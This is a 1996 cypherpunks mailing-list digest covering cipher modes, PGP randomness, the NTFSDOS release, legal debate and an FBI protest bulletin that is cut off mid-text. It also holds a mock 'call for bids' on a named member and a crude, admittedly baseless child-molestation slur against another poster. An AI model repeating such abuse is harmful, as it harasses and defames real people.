Message-ID: <199604222225.SAA18546@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Karl A. Siil" writes:
> Folks,
> 
> As this sounds like a previously solved problem, I wanted to find out about
> using DES (or any block cipher) as a stream cipher, i.e., in a manner that
> keeps input and output data length equal.

DES (and other block ciphers) has a couple of modes that let you do
this -- CFB mode and OFB mode come to mind. Their security hasn't been
that well studied to my knowledge. However...

> I don't want to use a true stream cipher, as I want to use the same
> key for multiple messages and stream ciphers tend to place the bulk
> of their overhead in the re-key.

????

> Since stream ciphers have "memory," I would have to "re-key" to the
> same key for each of my messages. I would rather key something like
> DES once and run it in CBC mode or use some other form of IV.

???

You ought to explain your application more clearly; it isn't
necessarily the case that a stream cipher is appropriate for you.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 23 Apr 1996 10:23:03 +0800
To: cypherpunks@toad.com
Subject: [Laffs] Citizen in need of correction
Message-ID: <v03006606ada1b8119d22@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: 21 Apr 1996 03:25:13 +0200
From: anon-remailer@utopia.hacktic.nl (Anonymous) (by way of
rah@shipwright.com (Robert A. Hettinga))
To: rah@shipwright.com
Subject: Citizen in need of correction
Organization: Hack-Tic International, Inc.
Path:
news-central.tiac.net!news-in.tiac.net!news.kei.com!newsfeed.internetmci.com!how
land.reston.ans.net!EU.net!sun4nl!xs4all!utopia.hacktic.nl!not-for-mail
Newsgroups:
talk.politics.crypto,talk.politics.libertarian,alt.politics.libertarian,alt.soci
ety.anarchy,alt.privacy,alt.security.pgp,alt.activism,alt.anarchism,alt.cyberpun
k,alt.politics.datahighway
Lines: 4
Sender: remailer@utopia.hacktic.nl
NNTP-Posting-Host: utopia.hacktic.nl
Comments: <postmaster@utopia.hacktic.nl>
Xref: news-central.tiac.net talk.politics.crypto:205
talk.politics.libertarian:3955 alt.politics.libertarian:5165
alt.society.anarchy:606 alt.privacy:251 alt.security.pgp:802
alt.activism:3485 alt.anarchism:116 alt.cyberpunk:492
alt.politics.datahighway:297
X-Newsreader: Yet Another NewsWatcher 2.1.2

We seem to have a problem with an inconsiderate citizen. This is a call
for bids on the case of jimbell@pacifier.com (jimbell)
-- Please send your bids to getjim@blacknet.net by midnight GMT, April
25th, 1996.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 23 Apr 1996 11:17:13 +0800
To: "Karl A. Siil" <karl@geoplex.com>
Subject: Re: DES as a stream cipher
In-Reply-To: <2.2.32.19960422214547.006b636c@geoplex.com>
Message-ID: <9604222228.AA01072@bart-savagewood.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> As this sounds like a previously solved problem, I wanted to find out about
> using DES (or any block cipher) as a stream cipher, i.e., in a manner that
> keeps input and output data length equal. I don't want to use a true stream
> cipher, as I want to use the same key for multiple messages and stream
> ciphers tend to place the bulk of their overhead in the re-key. Since stream
> ciphers have "memory," I would have to "re-key" to the same key for each of
> my messages. I would rather key something like DES once and run it in CBC
> mode or use some other form of IV.

Well, it all depends on what encryption mode you are using.  You can
always use cfb or ecb or ofb modes to get a stream-like cipher.
However you have to beware the security ramifications of using these
encryption modes.

FYI: PGP uses IDEA in cfb mode (albeit in a strange way).

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean T Carnes <crisper@ascensionet.com>
Date: Tue, 23 Apr 1996 12:06:44 +0800
To: "'cypherpunks@toad.com>
Subject: Searching
Message-ID: <01BB3082.9D8BFEE0@ppp4>
MIME-Version: 1.0
Content-Type: text/plain


Is anyon eon this list who recently went or is currently attending Purdue University in Indiana??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Apr 1996 14:28:04 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: [Laffs] Citizen in need of correction
Message-ID: <m0uBXXg-000951C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:26 PM 4/22/96 -0400, Robert Hettinga wrote:
>
>--- begin forwarded text
>
>Xref: news-central.tiac.net talk.politics.crypto:205
>talk.politics.libertarian:3955 alt.politics.libertarian:5165
>alt.society.anarchy:606 alt.privacy:251 alt.security.pgp:802
>alt.activism:3485 alt.anarchism:116 alt.cyberpunk:492
>alt.politics.datahighway:297
>X-Newsreader: Yet Another NewsWatcher 2.1.2
>
>We seem to have a problem with an inconsiderate citizen. This is a call
>for bids on the case of jimbell@pacifier.com (jimbell)
>-- Please send your bids to getjim@blacknet.net by midnight GMT, April
>25th, 1996.
>
>--- end forwarded text
>-----------------
>Robert Hettinga (rah@shipwright.com)
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"If they could 'just pass a few more laws',
>  we would all be criminals."    --Vinnie Moscaritolo
>The e$ Home Page: http://thumper.vmeng.com/pub/rah/


In the spirit of Ivan Dragomiloff and the Lord High Executioner, I'll take that contract!

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Tue, 23 Apr 1996 12:02:15 +0800
To: cypherpunks@toad.com
Subject: [NOISE]: Test, please ignore.
Message-ID: <Pine.LNX.3.92.960422192711.12006A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Just bouncing a message off the server in the hopes that cypherpunks
messages begin to flow again...

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 23 Apr 1996 16:30:36 +0800
To: cypherpunks@toad.com
Subject: NTFS Support for DOS/Win3.x,95 (fwd)
Message-ID: <Pine.ULT.3.92.960422174012.2448E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This could be interesting, since some people considered the NTFS file
system for Linux to be news.

---------- Forwarded message ----------
Date: 22 Apr 1996 15:17:04 -0700
From: mark eugene russinovich <mer@cs.uoregon.edu>
To: comp-os-ms-windows-announce@uunet.uu.net
Subject: NTFS Support for DOS/Win3.x,95

We are releasing our first version of NTFSDOS, a DOS/Windows
NTFS disk recognizer, today at Andrew Schulman's web site:

	ftp://ftp.ora.com/windows/pub/examples/win95.update/schulman.html

In addition, the executable has been posted to:

	comp.binaries.ms-windows

Below is the README that accompanies the executable.

======================================================================

NTFS File System Redirector for DOS/Windows V0.9 (read-only)
Copyright (C) 1996 Mark Russinovich and Bryce Cogswell

======================================================================

NTFSDOS.EXE is a network file system redirecter for DOS/Windows
that is able to recognize and mount NTFS drives for transparent
access.  It makes NTFS drives appear virtually indistinguishable
from standard FAT drives, providing the ability to navigate, view
and execute programs on them from DOS or from Windows, including
from the Windows 3.1 File Manager and Windows 95 Explorer.

Here is sample output from an NTFSDOS session under DOS 7.0 (Windows 95):
----------------------------------------------------------------------
C:\ntfsdos>ntfsdos

NTFS File System Redirector for DOS/Windows V0.9 (read-only)
Copyright (C) 1996 Mark Russinovich and Bryce Cogswell

Initialized 512KB of EMS cache.

Mounting NTFS partition(0x80:3) as drive: H

C:\ntfsdos>h:

H:\>dir

 Volume in drive H is ntfs
 Directory of H:\

ctrl2cap       <DIR>        04-09-96  3:15p
dblscan        <DIR>        04-09-96  3:15p
filemon        <DIR>        04-09-96  3:15p
flush          <DIR>        04-09-96  3:15p
new            <DIR>        04-08-96  5:35p
NEWFILE                  9  04-18-96  4:31p
record         <DIR>        04-09-96  3:15p
vcmon          <DIR>        04-09-96  3:15p
vsd            <DIR>        04-09-96  3:15p
vxdmon         <DIR>        04-09-96  3:15p
winnt          <DIR>        04-19-96  9:02a
         1 file(s)              9 bytes
        10 dir(s)          79,872 bytes free

H:\>
----------------------------------------------------------------------

Installation and Use
--------------------

To use NTFSDOS, simply execute it from the DOS command line (DOS
5.0 or greater is required). Executing NTFSDOS before Windows is
started will create logical drives that are visible globally once inside
Windows. Executing NTFSDOS in a DOS box means that the NTFS drives
only exist within the DOS box where NTFSDOS was executed.

When NTFSDOS starts, it will scan all hard-disk parititions on
your system to look for NTFS drives. It will mount all NTFS drives
it finds as unique DOS logical drive letters, and will inform you
as it does so.

NTFSDOS implements its own caching, and uses one of two types of
memory, depending on how your system is configured. Its first
choice is to use EMS memory for caching, as this minimizes demands
placed on conventional memory. If you start NTFSDOS before Windows,
then HIMEM.SYS and EMM386.EXE (without the /NOEMS option), both of which
can be found in the WINDOWS directory under Windows 95 or the DOS
directory under Windows 3.1, or their equivalents, must be started
before NTFSDOS. If NTFSDOS does not detect an EMS server, it will
resort to allocating 64KB of conventional memory for its cache. In
either case, it will inform you of its action.

There is currently no way to unload NTFSDOS from memory once it has
started.


Notes on Usage
--------------

NTFSDOS is being released with no known bugs, although it does
currently have some shortcomings, most of which we hope to solve
for a next release:

- executing some Windows programs on NTFS drives results in
  messages indicating that some DLL is missing. This error appears
  to be the result of updates to the network redirecter specification
  for Windows 95 which are undocumented. Specifically, it appears that
  INT 2F/1123 (qualify pathname) has changed and must be supported. If
  you have any information regarding this, please contact us.

- modify and access times are not supported (for example when
  "properties" is selected in the Windows 95 explorer) since their
  addition to the Windows 95 network redirecter spec is undocumented.
  NTFSDOS does have this time information available to it, so if you
  have any knowledge of the redirecter support required to provide it,
  please let us know.

- performance is particularly poor when viewing extremely large
  directories (that contain hundreds of files) under the Windows 95
  explorer. This is due to a blind, sector-base caching scheme. We
  plan to implement "smart caching" (tm) :-), that adds directory
  information to the caching scheme. This should improve performance
  dramatically.

- opening some types of documents, for example bitmaps, results in a
  message from Windows that the document cannot be registered. This
  again appears to be a side-effect of a changed Windows 95
  redirecter interface.  Unfortunatley, to view these files you must
  first copy them to a non-NTFS drive and then open them. If you have
  any information about this, please contact us.

- NTFSDOS does not currently provide long-file name support for its
  NTFS drives under Windows 95. We are looking into providing this for
  the next release.


Reaching Us
-----------

We would appreciate any feedback you have concerning this utility
including suggestions and bug reports. Mark can be reached at
markr@numega.com, and Bryce can be reached at cogswell@cs.uoregon.edu.


Acknowledgements
----------------

Significant understanding of the NTFS file system layout was derived by
studying the Linux-based NTFS driver code maintained by Martin von Lowis.
We acknowledge his indirect contribution to this endeavor.

Andrew Schulman, et. al.'s, book, Undocumented DOS (Addison-Wesley),
was invaluable in providing network redirecter information necessary for
implementing NTFSDOS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 23 Apr 1996 15:51:15 +0800
To: timd@consensus.com
Subject: Re: PGP's +makerandom is broken (was: Re: Article on PGP flaws)
Message-ID: <199604230424.VAA15677@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a Java applet which runs 10K bytes of output of pgp +makerandom
through a noise sphere program.  It looks random to me.  I don't know how
it compares with jf_avon's observations.  Judge for yourself.

http://www.portal.com/~hfinney/java/noise/noise.html

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Apr 1996 19:32:07 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: 5th protect password?
Message-ID: <m0uBZkb-000986C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:25 PM 4/21/96 +0000, Jonathon Blake wrote:

>
>	The first forensic use of graphology may have occurred as early 
>	as 1960.  In 1975, a Juvenile Court Judge in Boulder CO used
>	graphology forensically to determine the most appropriate method
>	of handling some of the cases that appeared in _his_ court.
>
>	Most courts in the United States regard the forensic use of
>	graphology as dubious, at best.   A few have ruled against 
>	it. 
>
>> The point is that the demanding of handwriting samples is a fairly new 
>> What do you want to bet that it first occurred in this century?
>
>	For questioned document examination?   Sometime during the
>	sixties.  
>	For graphological examination?  Hasn't occurred yet.  

Tell this to Unicorn.  He seems to disagree, although he hasn't cited specifics yet.


>
>> If that were the case, there there would be no justification for demanding a 
>> handwriting sample.  Nevertheless, it is apparently done.   And while a 
>
>	Can you provide a citation where a court has demanded a handwriting
>	sample for graphological purposes?

Adding the conditional "for graphological purposes," I can't.  I was merely 
referring to a SC decision previously quoted here.  The writing of that 
reference didn't make clear what purposes the sample could be used for.

>
>> Question:  Let's suppose, for the purposes of argument, the policy was 
>> diametrically opposite, and no such samples were taken, ostensibly because 
>
>	The gist of the argument is that handwriting samples are public,
>	and that things are written for public consumption, not private 
>	consumption.  
>
>> would come to the opposite conclusion.  You would have to explain to people 
>> why the precedents were all wrong.
>
>
>	You are taking a completely hypothetical situation that never had
>	a basis in what could have happened.

No.  What I was trying to do is to get people to stop thinking of legal 
precedent as being some sort of end-all incident that makes all further 
discussion pointless.  



>> demanded of a defendant in 1783, which was about when the 5th amendment was 
>> written.
>
>	What they said.
>	Where they said it. 
>	What they had in their possession.
>	Where they had said items in their possession.
>
>	Note in passing that rules for admitting something into 
>	evidence was a lot looser then, than it is now. 

If that's really the case, and this would today be considered a clear violation of the 5th, what does that say about the claim that "current government policy" must be right?

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 23 Apr 1996 16:54:37 +0800
To: cypherpunks@toad.com
Subject: EFF member discount @ Forum on Information Security, Apr. 29
Message-ID: <199604230438.VAA04546@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Group and The Churchill Club graciously offer a discount to EFF
members ($20 instead of $35; includes filet mignon dinner, etc.)

                    The Forum on Information Security
             Celebrating 20 Years of Public Key Cryptography
                  Monday, April 29, 1996 -- 6 to 9 p.m.
         At the San Francisco Airport Marriott Hotel (Burlingame)
     Dinner and Forum: $20 for Club & EFF Members, $35 for Non-Members

                  Call 408-371-4460 to Make Reservations

This program is supported in part by an unrestricted grant from Cylink
Corporation


Press Release
-------------

                     FORUM ON INFORMATION SECURITY 
          TO REVIEW LEGISLATION TO COMBAT ECONOMIC ESPIONAGE 

Senate and House Bill Sponsors to Join FBI and U.S. Postal Service 
Representatives, Along With the Inventors of Public Key Cryptography,
in Discussing Ways to Safeguard Sensitive Data and Electronic Commerce

                                For More Information, Contact:
				Gary Quackenbush
				The Benjamin Group Inc.
				408-559-6090; fax (408) 599-6188
				gquack@s.v.tbgi.com

				Kate Apgar
				The Churchill Club
				408-371-4460


BURLINGAME, California (April 22, 1996) -- The Forum on Information
Security, Celebrating 20 Years of Public Key Cryptography, will be held
next Monday night, April 29, 1996, from 6 to 9 p.m in the main ballroom
of the San Francisco Airport Marriott Hotel in Burlingame, Calif. 
Topics to be addressed include:  What is the threat to national economic
security?  Will Federal export rules be eased on strong public keys? 
Should government have copies of your secret codes?  Can
state-of-the-art encryption be used by everyone in the U.S.?  And will
the legislation now in Congress solve these problems?

Sponsored by The Churchill Club, Silicon Valley's premier non-profit
public affairs forum, this event is supported in part with an
unrestricted grant from Cylink Corporation.   The purpose of this Forum
is to address increasing public concerns over the rise in economic
espionage, which -- according to a White House study -- is estimated to
cost American businesses up to $100 billion a year as some 23 countries
target U.S. trade secrets. 

Keynote speakers will include Senator Conrad Burns (R-MT), Senator
Larry Pressler (R-SD), and Congressman Robert Goodlatte 
(R-VA), sponsors of three separate legislative initiatives focusing on
relaxing government restrictions on the use and export of strong
encryption systems.  

The Forum is also being held to honor the founding fathers and
inventors of Public Key Cryptography, Whitfield Diffie, Martin Hellman
and Ralph Merkle, who some 20 years ago developed the original, patented
secure encryption algorithms used today as the pioneering technology
behind the Data Encryption Standard (DES), Digital Signature Standard
(DSS) and other standards-based cryptosystems.  The three inventors will
provide their perspectives on the past, present and future of Public Key
Cryptography

The program agenda also features a number of other information
security experts including:

David Morris, Vice President with Cylink Corporation, will serve as
master of ceremonies for the Forum and set the stage for the evening by
outlining a five-part criteria essential for a hackerproof information
security system.

Jim Omura, Chief Technology Officer and co-founder of Cylink, will
provide a definition of Public Key Cryptography and other unfamiliar
terminology required to understand the technology and how it impacts the
public and private sectors.

James Freeman, FBI Special Agent in Charge of the San Francisco area,
will provide an overview of the threat to national economic security
with examples of investigations involving Silicon Valley high-tech
companies.

Paul Raines, Project Manager with the U.S. Postal Service, will preview
the soon-to-be-announced electronic postmarking system, the first
nationwide consumer application of Public Key Cryptography incorporating
a certificate authority and key registry bureau.

For Forum information and reservations, call the Churchill Club at
408-371-4460.  The fee for this event is $20 for Churchill Club members
and $35 for non-members and includes a full-course dinner and the
program.   Registration and the cocktail hour starts at 5:30 p.m. at the
San Francisco Airport Marriott Hotel in Burlingame with dinner at 6:00
p.m. immediately followed by the program at 6:35 p.m.


Agenda
------

The Forum on Information Security
Celebrating 20 Years of Public Key Cryptography

San Francisco (Burlingame) Airport Marriott Hotel
April 29, 1996  (6 p.m. to 9:30 p.m. PDT)


5:30 p.m.    Registration and Seating Begins (Cocktail Hour at Cash Bar)
  
6:00 p.m.    Dinner is Served: Marriott Hotel Ballroom 2nd Floor

6:30 p.m.    Ken Roberts, Principal, New Futures World Marketing, 
	and Churchill Club President, Gives Welcome, IntroducesMC

6:35 p.m.    David Morris, Vice President, Cylink
	Corporation. Overview of Events by Master of Ceremonies
	The Five Essential Ingredients of Any Data Security System

6:45 p.m.    Jim Omura, Chief Technology Officer, Cylink
	Corporation, and a Co-Founder of the Company
	What is Public Key Cryptography?

7:00 p.m.     Senator Conrad Burns (R-MT) 		
              Senator Larry Pressler (R-SD) 			
              Congressman Robert Goodlatte (R-VA)
	The Need for Legislation to Ease Export Restrictions
	and to Ensure the Widest Possible Utilization of
	Strong Encryption Systems in the United States

7:45 p.m.   James Freeman, Special Agent in Charge, FBI
	(Federal Bureau of Investigation), San Francisco Office
	The Threat and Reality of Industrial Espionage in the Bay Area

8:00 p.m.    Paul Raines, Project Manager, USPS
	United States Postal Service
	Electronic Postmark Service and the Key Registry Bureau,
	The First Nationwide Application of Public Key Cryptography
	for the Average Citizen Incorporating a Certificate Authority

8:15 p.m.     Whitfield Diffie, Martin Hellman, Ralph Merkle
	Pioneering Inventors/Developers of Public Key Cryptography
	Comment on the Past and Future of Advanced Cryptosystems.
	20 Years of Public Key Cryptography (Panel)

9:00 p.m.     Award Presentations, Conclusion & Summary (David Morris)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 23 Apr 1996 16:37:11 +0800
To: "Jed Liu" <cypherpunks@toad.com
Subject: Re: Entropy
Message-ID: <199604230500.WAA23405@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 AM 4/22/96 EST, Jed Liu wrote:
> I've heard a lot of discussion here about "entropy tests" and "tests 
> for randomness".  Could somebody please explain to me one of these 
> tests (or would that take too long?) ?  Thanks.

You cannot test for entropy, not can you test for randomness.

You can however test for particular kinds of non randomness 
and particular kinds of lack of entropy.

Such tests are only useful if you have an adequately understood
source of entropy.

Each such test is only appropriate for particular sources of
entropy.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 23 Apr 1996 16:29:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: premail/pine 3.93
Message-ID: <Pine.SUN.3.93.960422220429.10858E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone gotten premail to work with pine 3.93 properly yet?


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 23 Apr 1996 17:03:53 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Nazis on the Net
In-Reply-To: <01I3V1T4ISI88Y4Z9L@mbcl.rutgers.edu>
Message-ID: <Pine.ULT.3.92.960422221019.4599J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith actually might have written:

>I've seen various quotes from Randy Weaver in various publications,
>including Time and other non-right-wing ones. None of them indicated him
>as an actual neo-Nazi or racist

BWAHAHAHA!!!

Here's a URL for a *highly sympathetic* piece on Weaver that complains
that, "I will be happier when the press stops demonizing Weaver -- in
subtle and not so subtle ways -- in news stories and editorials. He is
referred to so consistently as "White Separatist Randall Weaver" that one
would be forgiven for assuming that his parents gave him the first name
"White,"  while "Separatist" was some old family name handed down from his
maternal aunt":

 http://www.omnet.com/What-I-Think/col.09-01-95B.html

Here are some *highly sympathetic* URLs that mention that Weaver was a
white separatist/Aryan Nations wacko:

http://www.scimitar.com/revolution/by_topic/firearms/enforce/rubyridge/setup.html
http://eagle.tamu.edu/~carlp/Liberty/Weaver.Case.AR.html

A slightly more balanced piece from the New York Times:

 http://eagle.tamu.edu/~carlp/Liberty/Weaver.Case.NYT.html

FWIW, the Anti-Defamation League, which I am *well aware* has said sily
things about militias and skinheads in the past, mentions Weaver in this
report:

 http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/w/weaver.randy/aryan-nations

I have also heard Weaver cited quite favorably on the Stormfront list,
which has repudiated Timothy McVeigh because his friend Terry Nichols has
a Filipino wife. This makes McVeigh a Race Traitor by association, of
course.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 23 Apr 1996 17:10:36 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Nazis on the Net
Message-ID: <199604230524.WAA24749@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>' wrote: 
> > Randy Weaver was neither a neo-Nazi nor a racist. He was
> > (and, so far as I know, still is) a white separatist. 
> > (One would think liberals would tolerate this - they 
> > tolerate the equally offensive black separatists,
> > after all...).


The well known child molester tallpaul wrote: 
> Might we know the source of his complete info on Weaver's political and
> racial beliefs.  
>
> I see, in essence, three hypothesis: 
> 
> 1) Cover the ass of a potential neo-Nazi or racist (or both) without any
> reference to what is really true; 
>
> 2) Get information from outer space; 


Well, child-molester-tallpaul, I notice that the liberal lapdog press
calls him White-Separatist-Randy-Weaver as though he was baptized 
"white separatist" at birth.

Presumably if they had one grain of evidence that he was a Nazi or a 
white supremacist, they would call him White-supremacist-Randy-Weaver.

I notice that you have not one grain of evidence that he is a nazi,
just as I have not one grain of evidence that you fuck little boys
up their asses, but you insinuate that he is a Nazi until somehow proven
innocent (and how can anyone prove himself innocent of thought crime),
and you also insinuate that anyone who suggests otherwise must be 
a nazi or nazi sympathizer himself.  Obvious proof that you are
a homosexual child molester.

(Note for the seriously humor impaired.  I have no more reason
to believe that tallpaul rapes little children than tallpaul 
has to believe that Randy Weaver was a white supremacist or 
tallpaul has to believe that Allen Smith is a Nazi sympathizer.)
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Tue, 23 Apr 1996 14:55:52 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: OpenSoft ExpressMail
Message-ID: <199604230238.WAA15212@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I've been a bit behind with the mail, so I don't know if anyone 
brought this up yet.  We just got a beta copy of OpenSoft ExpressMail.
It's a DLL that plugs in as a messaging service for the Win95 desktop
Inbox.  The sheet that comes with it mentions the following:

Compatible with:
	-- S/MIME
	-- DCS
	-- Verisign format Digital ID's
	-- POP3
	-- RFC's 821, 822, 876, 1123, 1153, 1460, 1651, and 1653

Features:
	-- Talk about "Total encryption key (digital ID) management system
	-- Full MIME support
	-- Variable key length (no ceiling mentioned)
	-- Talk about spiffy address book capabilities (good to get
	   the non-geeks into it)

The problem is, I can't seem to get it working.  There is no setup 
app (which I hope they plan to put in the production model ... for
their sakes).  The Macro$loth Mail system doesn't seem to like the idea
of using the DLL.  I'm going to see if I have any luck with the Mail
server that came with it (I forgot to mention that this is a whole
client/server combo).  The client is for Win95, the server for Win95/NT.

Another added nicety is that there is supposedly a free standalone decoder
app.  I'm going to see if I can get my hands on it (if it is past vapor
yet).

I hope I can get this functional, cuz I wanna play, dammit!
- -- 
  Mark Rogaski    | Why read when you can just sit and |      Member
  System Admin    |         stare at things?           | Programmers Local
  GTI GlobalNet   | Any expressed opinions are my own  |     # 0xfffe
wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXxCoQ0HmAyu61cJAQGoAwP/Wj01PYKKBn8BPgHHqq4jgscpwnkk2kBK
xiRzzhcY59N0POPpf6pujxCESfXH7kpa6c5ZGgF/iZKgdaKCLQyfpS08pu+Bw5uO
7RxOI/MTaPrYHmCCrwCJ15ZYLm2mIOGh2MqA6qaJ+km6mK9vrzdxZ/Td+dj/4Hct
SYqq2OfdXpo=
=8OyV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@vplus.com (Dan Weinstein)
Date: Tue, 23 Apr 1996 12:39:38 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: java security
In-Reply-To: <199604220633.XAA07953@dfw-ix2.ix.netcom.com>
Message-ID: <317c16d7.7421788@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Apr 1996 23:35:38 -0700, you wrote:


>Were they Java, or JavaScript?  Much different.  Among other things,
>JavaScript runs on Win3.1, and Netscape doesn't let you turn it off.
>I've had at least one event of JavaScript crashing Netscape; the part
>of the script I noticed was scrolling lots of stuff along the bottom
>(Hail Eris!  All Hail Discordia!  Etc. Etc.) but maybe there was more.
>#					Thanks;  Bill
># Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215

You can turn off JavaScript, but you must be running 2.01 or later.


Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 23 Apr 1996 21:20:29 +0800
To: cypherpunks@toad.com
Subject: FBI Bulletin: Social Protests in the 1990s: Planning a Response
Message-ID: <01I3V17SNRYW8Y4Z9L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	An interesting look at FBI psychology for some things. Looks like the
pro-lifers are getting a bit more sensible... pity from my viewpoint, but good
as an example.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 22-APR-1996 07:46:41.16
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sat, 20 Apr 1996 12:57:28 -0400
From: Matthew Gaylor <freematt@coil.com>
Subject: FBI Bulletin: Social Protests in the 1990s: Planning a Response

Social Protests in the 1990s: Planning a Response

By Gary A. Allgeyer, M.S.
Captain Allgeyer serves with the Melbourne, Florida, Police
Department.

>From the January 1996 Issue of The FBI Law Enforcement Bulletin

"The Law Enforcement Bulletin is published monthly by the Federal
Bureau of Investigation, Ninth and Pennsylvania Ave, N.W.,
Washington, D.C. 20535. Contributors' opinions and statements
should not be considered as an endorsement for any policy, program, or
service by the FBI."




During the 1990s, many communities have witnessed a resurgence in
protests and civil disobedience demonstrations reminiscent of the
civil rights and antiwar movements of earlier decades. Major
issues today include abortion, nuclear proliferation,
environmental protection, service and access rights of the
physically challenged, and continued civil rights concerns. Any
community with product- or service-oriented businesses or
military installations may be targeted for action, either by
local activists or national organizations.

The City of Melbourne, located on the southeast central coast of
Florida, has been the focus of such actions in recent years,
primarily due to the presence of the only   abortion clinic in a
county with almost one-half million residents. In addition, the
clinic's highly outspoken owner makes her home in Melbourne, as
does the leader of Operation Rescue, a national pro-life
organization. These factors have made the city a hotbed for the
abortion issue.

